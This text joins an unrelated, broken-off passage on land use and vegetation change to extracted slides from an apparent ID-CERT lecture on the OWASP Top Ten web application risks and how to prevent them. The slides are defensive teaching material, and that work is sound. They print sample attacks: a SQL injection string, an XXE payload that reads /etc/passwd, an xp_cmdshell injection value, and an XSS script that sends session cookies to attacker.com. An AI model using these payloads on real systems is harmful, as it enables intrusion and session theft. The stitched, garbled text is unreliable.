more evident. A crucial element of this impact is the alteration of vegetation cover, which plays a
significant role in maintaining the ecological equilibrium of our planet.Land serves as the foundation for all human activities and provides the necessary materials for
these activities. As the most crucial natural resource, its utilization by humans results in different
'Land uses,' which are determined by both human activities and the physical characteristics of the
land.
The utilization of land is impacted by human needs and environmental factors. In countries
like India, rapid population growth and the emphasis on extensive resource exploitation can lead
to significant land degradation, adversely affecting the region's land cover.
Therefore, human intervention has significantly influenced land use patterns over many
centuries, evolving its structure over time and space. In the present era, these changes have
accelerated due to factors such as agriculture and urbanization. Information regarding land use and
cover is essential for various planning and management tasks related to the Earth's surface,
providing crucial environmental data for scientific, resource management, policy purposes, and
diverse human activities.
Accurate understanding of land use and cover is imperative for the development planning
of any area. Consequently, a wide range of professionals, including earth system scientists, land
and water managers, and urban planners, are interested in obtaining data on land use and cover
changes, conversion trends, and other related patterns. The spatial dimensions of land use and
cover support policymakers and scientists in making well-informed decisions, as alterations in
these patterns indicate shifts in economic and social conditions. Monitoring such changes with the
help of Advanced technologies like Remote Sensing and Geographic Information Systems is
crucial for coordinated efforts across different administrative levels. Advanced technologies like
Remote Sensing and Geographic Information Systems
9
Changes in vegetation cover refer to variations in the distribution, composition, and overall
structure of plant communities across different temporal and spatial scales. These changes can
occur natural.
4. ID-CERT
• Indonesia Computer Emergency Response Team
• 1998 – Dr. Budi Rahardjo
• Community based
• Incident Handling
• Malware Lab
• Research & Training about Malware
• Tools: Malware Scanner
• Founder AP-CERT: JP-CERT & AusCERT
www.cert.or.id/
6. • 30,000 websites are hacked everyday
• hundred of free tools available in internet for hacking a website
• 70% attack come through web app
• Web vulnerability
www.cert.or.id/
7. • SQL injection sony attack LulzSec
• Leaked 77 million user data
• 1 month shutdown
• $171 million
8. • CSS vulnerability Android Market
• Allow attacker to remotely install apps onto user android device
www.cert.or.id/
9. We Are Secure, We Have a Firewall
• Myth about Firewall
• Closed off ports
13. Owasp top 10
• Open Web Application Security Project
• Open souce project à improving web application security
• Individual Contributor, Company Sponsor, Volunteer
• Secure Coding, library
• Tools, scanner, vulnerable lab
• Top Ten List
14. OWASP Top Ten
• 2004
• 2007
• 2010
• 2013
• 2017
www.cert.or.id/
16. 1. Injection
• SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers,
SMTP headers, expression languages, and ORM queries.
• occur when untrusted data is sent to an interpreter as part of a
command or query.
• The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing data without proper
authorization
17. Injection
• Injection flaws are easy to discover when examining code.
• Scanners and fuzzers can help attackers find injection flaws.
• Injection can result in data loss, corruption, or disclosure to
unauthorized parties, loss of accountability, or denial of access.
• Injection can sometimes lead to complete host takeover.
www.cert.or.id/
18. An application is vulnerable to attack when ?
• User-supplied data is not validated, filtered, or sanitized by the
application.
• Dynamic queries or non-parameterized calls without context- aware
escaping are used directly in the interpreter.
• Hostile data is used within object-relational mapping (ORM) search
parameters to extract additional, sensitive records.
• Hostile data is directly used or concatenated, such that the SQL or
command contains both structure and hostile data in dynamic
queries, commands, or stored procedures.
19. Defense
• Source code review
• automated testing of all parameters, headers, URL, cookies, JSON,
SOAP, and XML data inputs
• static source (SAST) and dynamic application test (DAST) tools into the
CI/CD pipeline
www.cert.or.id/
20. How to Prevent
• use a safe API
• avoids the use of the interpreter entirely or provides a parameterized
interface, or migrate to use Object Relational Mapping Tools (ORMs)
• Use positive or "whitelist" server-side input validation.
• For any residual dynamic queries, escape special characters using the
specific escape syntax for that interpreter.
• Use LIMIT and other SQL controls within queries to prevent mass
disclosure of records in case of SQL injection.
21. Example Attack Scenarios
• Scenario #1: An application uses untrusted data in the construction of
the following vulnerable SQL call:
• String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'";
• Scenario #2: Similarly, an application’s blind trust in frameworks may
result in queries that are still vulnerable, (e.g. Hibernate Query
Language (HQL)):
• Query HQLQuery = session.createQuery("FROM accounts WHERE
custID='" + request.getParameter("id") + "'");
www.cert.or.id/
22. Attack
• In both cases, the attacker modifies the ‘id’ parameter value in their
browser to send: ' or '1'='1. For example:
• http://example.com/app/accountView?id=' or '1'='1
• This changes the meaning of both queries to return all the records
from the accounts table.
• More dangerous attacks could modify or delete data, or even invoke
stored procedures.
24. 2. Broken Authentication
• Attackers have access to hundreds of millions of valid username and
password combinations for credential stuffing, default administrative
account lists, automated brute force, and dictionary attack tools.
• Session management attacks are well understood, particularly in
relation to unexpired session tokens.
• The prevalence of broken authentication is widespread due to the
design and implementation of most identity and access controls.
• Session management is the bedrock of authentication and access
controls, and is present in all stateful applications.
www.cert.or.id/
25. Broken Authentication
• Attackers can detect broken authentication using manual means
• Exploit them using automated tools with password lists and
dictionary attacks.
• Attackers have to gain access to only a few accounts, or just one
admin account to compromise the system.
• Depending on the domain of the application, this may allow money
laundering, social security fraud, and identity theft, or disclose legally
protected highly sensitive information.
26. Is the Application Vulnerable?
• Permits automated attacks such as credential stuffing, where the
attacker has a list of valid usernames and passwords.
• Permits brute force or other automated attacks.
• Permits default, weak, or well known passwords, such as "Password1"
or "admin/admin“.
• Uses weak or ineffective credential recovery and forgot- password
processes, such as "knowledge-based answers", which cannot be
made safe.
www.cert.or.id/
27. Broken Authentication Vulnerable
• Uses plain text, encrypted, or weakly hashed passwords (see
A3:2017-Sensitive Data Exposure).
• Has missing or ineffective multi-factor authentication.
• Exposes Session IDs in the URL (e.g., URL rewriting).
• Does not rotate Session IDs after successful login.
• Does not properly invalidate Session IDs. User sessions or
• authentication tokens (particularly single sign-on (SSO) tokens) aren’t
properly invalidated during logout or a period of inactivity.
28. How to Prevent
• Multi-factor authentication to prevent automated, credential stuffing,
brute force, and stolen credential re-use attacks.
• Do not ship or deploy with any default credentials, particularly for
admin users.
• Implement weak-password checks, such as testing new or changed
passwords against a list of the top 10000 worst passwords.
www.cert.or.id/
29. Defense
• Align password length, complexity and rotation policies
• NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets or other
modern, evidence based password policies.
• Ensure registration, credential recovery, and API pathways are hardened
against account enumeration attacks by using the same messages for all
outcomes.
• Limit or increasingly delay failed login attempts. Log all failures and alert
administrators when credential stuffing, brute force, or other attacks are
detected.
• Use a server-side, secure, built-in session manager that generates a new
random session ID with high entropy after login. Session IDs should not be
in the URL, be securely stored and invalidated after logout, idle, and
absolute timeouts.
30. Example Attack Scenarios
• Scenario #1: Credential stuffing, the use of lists of known passwords,
is a common attack.
• If an application does not implement automated threat or credential
stuffing protections, the application can be used as a password oracle
to determine if the credentials are valid.
• Scenario #2: Most authentication attacks occur due to the continued
use of passwords as a sole factor.
• Once considered best practices, password rotation and complexity
requirements are viewed as encouraging users to use, and reuse,
weak passwords. Organizations are recommended to stop these
practices per NIST 800-63 and use multi-factor authentication.
www.cert.or.id/
31. Attack
• Scenario #3: Application session timeouts aren’t set properly.
• A user uses a public computer to access an application.
• Instead of selecting “logout” the user simply closes the browser tab
and walks away.
• An attacker uses the same browser an hour later, and the user is still
authenticated.
33. 3. Sensitive Data Exposure
• Rather than directly attacking crypto, attackers steal keys, execute
man-in- the-middle attacks, or steal clear text data off the server,
while in transit, or from the user’s client, e.g. browser.
• A manual attack is generally required.
• Previously retrieved password databases could be brute forced by
Graphics Processing Units (GPUs)
• The most common flaw is simply not encrypting sensitive data.
• When crypto is employed, weak key generation and management,
and weak algorithm, protocol and cipher usage is common,
particularly for weak password hashing storage techniques.
www.cert.or.id/
34. Sensitive Data Exposure
• For data in transit, server side weaknesses are mainly easy to detect,
but hard for data at rest.
• Failure frequently compromises all data that should have been
protected.
• Typically, this information includes sensitive personal information (PII)
data such as health records, credentials, personal data, and credit
cards,
35. Is the Application Vulnerable?
• Is any data transmitted in clear text?
• HTTP, SMTP, and FTP.
• External internet traffic is especially dangerous. Verify all internal
traffic e.g. between load balancers, web servers, or back-end systems.
• Is sensitive data stored in clear text, including backups?
• Are any old or weak cryptographic algorithms used?
www.cert.or.id/
36. Is the Application Vulnerable?
• Are default crypto keys in use, weak crypto keys generated or re-used,
or is proper key management or rotation missing?
• Is encryption not enforced, e.g. are any user agent (browser) security
directives or headers missing?
• Does the user agent (e.g. app, mail client) not verify if the received
server certificate is valid?
37. How to Prevent
• Classify data processed, stored, or transmitted by an application.
Identify which data is sensitive according to privacy laws, regulatory
requirements, or business needs.
• Apply controls as per the classification.
• Don’t store sensitive data unnecessarily. Discard it as soon as possible
or use PCI DSS compliant tokenization or even truncation. Data that is
not retained cannot be stolen.
• Make sure to encrypt all sensitive data at rest.
• Ensure up-to-date and strong standard algorithms, protocols, and
keys are in place; use proper key management.
www.cert.or.id/
38. How to Prevent
• Encrypt all data in transit with secure protocols such as TLS with
perfect forward secrecy (PFS) ciphers, cipher prioritization by the
server, and secure parameters. Enforce encryption using directives
like HTTP Strict Transport Security (HSTS).
• Disable caching for responses that contain sensitive data.
• Store passwords using strong adaptive and salted hashing functions
with a work factor (delay factor), such as Argon2, scrypt, bcrypt, or
PBKDF2.
• Verify independently the effectiveness of configuration and settings.
39. Example Attack Scenarios
• Scenario #1: An application encrypts credit card numbers in a
database using automatic database encryption.
• However, this data is automatically decrypted when retrieved,
allowing an SQL injection flaw to retrieve credit card numbers in clear
text.
www.cert.or.id/
40. Scenario #2
• A site doesn't use or enforce TLS for all pages or supports weak
encryption.
• An attacker monitors network traffic (e.g. at an insecure wireless
network),
• downgrades connections from HTTPS to HTTP,
• intercepts requests, and steals the user's session cookie.
• The attacker then replays this cookie and hijacks the user's
(authenticated) session, accessing or modifying the user's private
data. Instead of the above they could alter all transported data, e.g.
the recipient of a money transfer.
41. Scenario #3:
• The password database uses unsalted or simple hashes to store
everyone's passwords.
• A file upload flaw allows an attacker to retrieve the password
database.
• All the unsalted hashes can be exposed with a rainbow table of pre-
calculated hashes.
• Hashes generated by simple or fast hash functions may be cracked by
GPUs, even if they were salted.
www.cert.or.id/
43. XML External Entities (XXE)
• Attackers can exploit vulnerable XML processors if
• they can upload XML
• include hostile content in an XML document,
• exploiting vulnerable code, dependencies or integrations.
44. XML External Entities (XXE)
• By default, many older XML processors allow specification of an
external entity, a URI that is dereferenced and evaluated during XML
processing.
• These flaws can be used to:
• extract data,
• execute a remote request from the server,
• scan internal systems,
• perform a denial-of-service attack
www.cert.or.id/
45. Is the Application Vulnerable?
• The application accepts XML directly or XML uploads, especially from
untrusted sources, or inserts untrusted data into XML documents,
which is then parsed by an XML processor.
• Any of the XML processors in the application or SOAP based web
services has document type definitions (DTDs) enabled. As the exact
mechanism for disabling DTD processing varies by processor, it is
good practice to consult a reference such as the OWASP Cheat Sheet
'XXE Prevention’.
46. XML External Entities (XXE)
• If your application uses SAML for identity processing within federated
security or single sign on (SSO) purposes. SAML uses XML for identity
assertions, and may be vulnerable.
• If the application uses SOAP prior to version 1.2, it is likely susceptible
to XXE attacks if XML entities are being passed to the SOAP
framework.
• Being vulnerable to XXE attacks likely means that the application is
vulnerable to denial of service attacks including the Billion Laughs
attack.
www.cert.or.id/
47. How to Prevent
• use less complex data formats such as JSON
• avoide serialization of sensitive data.
• Patch or upgrade all XML processors and libraries in use by the
application or on the underlying operating system.
• Use dependency checkers.
• Update SOAP to SOAP 1.2 or higher.
• Disable XML external entity and DTD processing in all XML parsers in
the application
48. How to Prevent
• Implement positive ("whitelisting") server-side input validation,
filtering, or sanitization to prevent hostile data within XML
documents, headers, or nodes.
• Verify that XML or XSL file upload functionality validates incoming
XML using XSD validation or similar.
• Virtual patching, API security gateways, or Web Application Firewalls
(WAFs)
www.cert.or.id/
49. Example Attack Scenarios
• The attacker attempts to extract data from the server:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]> --PrivateNet
<!ENTITY xxe SYSTEM "file:///dev/random" >]> -- DDoS
51. Broken Access Control
• Access control enforces policy such that users cannot act outside of
their intended permissions.
• Manual testing is the best way to detect missing or ineffective access
control, including HTTP method (GET vs PUT, etc), controller, direct
object references,
• attackers acting as users or administrators, or users using privileged
functions, or creating, accessing, updating or deleting every record.
www.cert.or.id/
52. Broken Access Control
• Bypassing access control checks by modifying the URL, internal
application state, or the HTML page, or simply using a custom API
attack tool.
• Allowing the primary key to be changed to another users record,
permitting viewing or editing someone else's account.
• Elevation of privilege. Acting as a user without being logged in, or
acting as an admin when logged in as a user.
53. Broken Access Control
• Metadata manipulation, such as replaying or tampering with a JSON
Web Token (JWT) access control token or a cookie or hidden field
manipulated to elevate privileges, or abusing JWT invalidation
• CORS misconfiguration allows unauthorized API access.
• Force browsing to authenticated pages as an unauthenticated user or
to privileged pages as a standard user. Accessing API with missing
access controls for POST, PUT and DELETE.
www.cert.or.id/
54. How to Prevent
• trusted server-side code or server-less API
• With the exception of public resources, deny by default.
• Implement access control mechanisms once and reuse them
throughout the application, including minimizing CORS usage.
• Model access controls should enforce record ownership, rather than
accepting that the user can create, read, update, or delete any record.
• Unique application business limit requirements should be enforced by
domain models.
•
55. Prevention
• Disable web server directory listing and ensure file metadata (e.g. .git)
and backup files are not present within web roots.
• Log access control failures, alert admins when appropriate (e.g.
repeated failures).
• Rate limit API and controller access to minimize the harm from
automated attack tooling.
• JWT tokens should be invalidated on the server after logout
www.cert.or.id/
56. Example Attack Scenarios
• Scenario #1: The application uses unverified data in a SQL call that is
accessing account information:
• pstmt.setString(1, request.getParameter("acct"));
• ResultSet results = pstmt.executeQuery( );
• An attacker simply modifies the 'acct' parameter in the browser to
send whatever account number they want. If not properly verified,
the attacker can access any user's account.
• http://example.com/app/accountInfo?acct=notmyacct
57. Attack Scenario
• Scenario #2: An attacker simply force browses to target URLs.
• Admin rights are required for access to the admin page.
• http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo
• If an unauthenticated user can access either page, it’s a flaw.
• If a non-admin can access the admin page, this is a flaw.
www.cert.or.id/
59. Security Misconfiguration
• unpatched flaws
• access default accounts,
• unused pages,
• unprotected files and directories, etc
• to gain unauthorized access or knowledge of the system.
60. Can happen in
• network services, platform, web server, application server, database,
frameworks, custom code, and pre-installed virtual machines,
containers, or storage.
• Automated scanners are useful for detecting misconfigurations, use
of default accounts or configurations, unnecessary services, legacy
options, etc.
• give attackers unauthorized access to some system data or
functionality.
• Occasionally, such flaws result in a complete system compromise.
www.cert.or.id/
61. Is the Application Vulnerable?
• Missing appropriate security hardening across any part of the
application stack, or improperly configured permissions on cloud
services.
• Unnecessary features are enabled or installed (e.g. unnecessary
ports, services, pages, accounts, or privileges).
• Default accounts and their passwords still enabled and unchanged.
• Error handling reveals stack traces or other overly informative error
messages to users.
62. Is the Application Vulnerable?
• upgraded systems, latest security features are disabled or not
configured securely.
• The security settings in the application servers, application
frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc.
not set to secure values.
• The server does not send security headers or directives or they are
not set to secure values.
• The software is out of date or vulnerable
www.cert.or.id/
63. How to Prevent
• A repeatable hardening process that makes it fast and easy to deploy
another environment that is properly locked down. Development, QA,
and production environments should all be configured identically,
with different credentials used in each environment. This process
should be automated to minimize the effort required to setup a new
secure environment.
• A minimal platform without any unnecessary features, components,
documentation, and samples. Remove or do not install unused
features and frameworks.
64. How to Prevent
• review and update the configurations appropriate to all security notes
• review cloud storage permissions (e.g. S3 bucket permissions).
• A segmented application architecture à separation between
components or tenants, with segmentation, containerization, or cloud
security groups.
• Sending security directives to clients, e.g. Security Headers.
• An automated process to verify the effectiveness of the
configurations and settings in all environments.
www.cert.or.id/
65. Example Attack Scenarios
• Scenario #1: The application server comes with sample applications
that are not removed from the production server.
• These sample applications have known security flaws attackers use to
compromise the server.
• If one of these applications is the admin console, and default
accounts weren’t changed the attacker logs in with default passwords
and takes over.
66. Scenario #2
• Directory listing is not disabled on the server.
• An attacker discovers they can simply list directories.
• The attacker finds and downloads the compiled Java classes, which
they decompile and reverse engineer to view the code.
• The attacker then finds a serious access control flaw in the
application.
www.cert.or.id/
67. Scenario #3
• The application server’s configuration allows detailed error messages,
e.g. stack traces, to be returned to users.
• This potentially exposes sensitive information or underlying flaws
such as component versions that are known to be vulnerable.
68. Scenario #4
• A cloud service provider has default sharing permissions open to the
Internet by other CSP users.
• This allows sensitive data stored within cloud storage to be accessed.
www.cert.or.id/
70. Cross-Site Scripting (XSS)
• Reflected XSS
• DOM XSS
• Stored XSS
• The impact of XSS is moderate for reflected and DOM XSS,
• Severe for stored XSS,
• remote code execution on the victim's browser,
• stealing credentials, sessions, delivering malware to the victim
71. Reflected XSS
• The application or API includes unvalidated and unescaped user input
as part of HTML output.
• A successful attack can allow the attacker to execute arbitrary HTML
and JavaScript in the victim’s browser.
• Typically the user will need to interact with some malicious link that
points to an attacker- controlled page, such as malicious watering
hole websites, advertisements, or similar.
www.cert.or.id/
72. • Stored XSS: The application or API stores unsanitized user input that
is viewed at a later time by another user or an administrator. Stored
XSS is often considered a high or critical risk.
• DOM XSS: JavaScript frameworks, single-page applications, and APIs
that dynamically include attacker-controllable data to a page are
vulnerable to DOM XSS. Ideally, the application would not send
attacker-controllable data to unsafe JavaScript APIs.
73. Impact
• session stealing, account takeover, MFA bypass, DOM node
replacement or defacement (such as trojan login panels), attacks
against the user's browser such as malicious software downloads, key
logging, and other client-side attacks.
www.cert.or.id/
74. How to Prevent
• Using frameworks that automatically escape XSS by design
• the latest Ruby on Rails, React JS
• Escaping untrusted HTTP request data based on the context in the
HTML output (body, attribute, JavaScript, CSS, or URL) will resolve
Reflected and Stored XSS vulnerabilities
• Applying context-sensitive encoding when modifying the browser
document on the client side acts against DOM XSS.
75. Example Attack Scenario
• Scenario 1: The application uses untrusted data in the construction of
the following HTML snippet without validation or escaping:
• (String) page += "<input name='creditcard' type='TEXT' value='" +
request.getParameter("CC") + "'>";
• The attacker modifies the ‘CC’ parameter in the browser to:
• '><script>document.location= 'http://www.attacker.com/cgi-
bin/cookie.cgi? foo='+document.cookie</script>'.
• This attack causes the victim’s session ID to be sent to the attacker’s
website, allowing the attacker to hijack the user’s current session.
www.cert.or.id/
81. Case 1
• Drop down menu & radio button
• What is you favourite color?
oRed
oBlue
oGreen
• Is It safe?
82. • Browser à Http request à Web Application
POST /color.php HTTP/1.1
Host: www.example.xxx
Content-Length:27
Content-Type: application/x-www-form-urlencoded
Color=Red à Attacker can modify this
Color=White ; Color= ‘;Exec+xp_cmdshell+‘...‘
www.cert.or.id/
83. Principle of least priviledge
• Only provide user with permission that allow him to accomplish what
he need to do, and no more
• Every new feature, add potential vulnerability
• Minimize user permission
• Minimize capability programming calls and object
84. Challenge
• Microservices written in node.js and Spring Boot are replacing
traditional monolithic applications.
• Microservices come with their own security challenges including
establishing trust between microservices, containers, secret
management, etc.
• Old code never expected to be accessible from the Internet is now
sitting behind an API or RESTful web service to be consumed by Single
Page Applications (SPAs) and mobile applications.
• Architectural assumptions by the code, such as trusted callers, are no
longer valid.
www.cert.or.id/
85. Challenge
• Single page applications, written in JavaScript frameworks such as
Angular and React, allow the creation of highly modular feature-rich
front ends.
• Client-side functionality that has traditionally been delivered server-
side brings its own security challenges.
• JavaScript is now the primary language of the web with node.js
running server side and modern web frameworks such as Bootstrap,
Electron, Angular, and React running on the client.
86. Classifying and Prioritizing Threats
• STRIDE: threat Classification system (Microsoft)
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial Of Service
• Elevation of Priviledge
www.cert.or.id/
89. Password Best Practice
• Minimum Password Length
• Enforce Password Complexity
• Rotate Password (90 D)
• Password Uniqueness
• Password = Username?
• Properly store password
90. Storing Password
• Dont store in Plaintext
• Use a strong Hash
• SHA 256; SHA 512
• MD5, SHA1
• 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D15
42D8
• Use Salt
www.cert.or.id/
94. Securing Authentication
• SSL/TLS
• Account Lockout (failed login)
• Number of attempt
• Window of measurement
• Lockout Period
• CAPTCHA (completely automated public turing test to tell Computers
& Human Apart) – brute force
• No Default account
• Dont hard code credential
• Remember me à cookies expiration
www.cert.or.id/
95. Session Management:
• sequence of network HTTP request and response transactions
associated to the same user
• Session Timeout (4 hours)
• Idle Session Timeout (20 Minutes)
• Limit the session concurrency
96. ACL : Access Control List
• Permission
• Read Write Execute
www.cert.or.id/
101. Learning Material
• DVWA (Damn Vulnerable Web Application)
• Webgoat
• Multillidae
• Owasp Juice Shop
• bwapp
• Hackthissite
• Hackthis
• Altoro Mutual
102. Reference
• Zalewski, M. (2011). The tangled Web: A guide to securing modern
web applications. No Starch Press.
• Sullivan, B., & Liu, V. (2011). Web application security, a beginner's
guide. McGraw-Hill Education Group.
• OWASP: https://www.owasp.org/index.php/Main_Page
• Local Chapter: https://www.owasp.org/index.php/Catalunya
• CERT Secure Coding